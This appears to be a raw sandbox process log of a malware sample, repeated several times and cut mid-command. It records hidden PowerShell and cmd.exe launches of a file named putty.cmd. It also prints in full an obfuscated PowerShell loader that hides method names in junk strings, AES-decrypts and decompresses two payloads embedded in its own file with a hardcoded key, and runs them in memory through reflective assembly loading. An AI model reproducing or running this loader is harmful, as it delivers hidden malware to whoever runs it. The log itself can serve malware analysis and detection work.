System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function 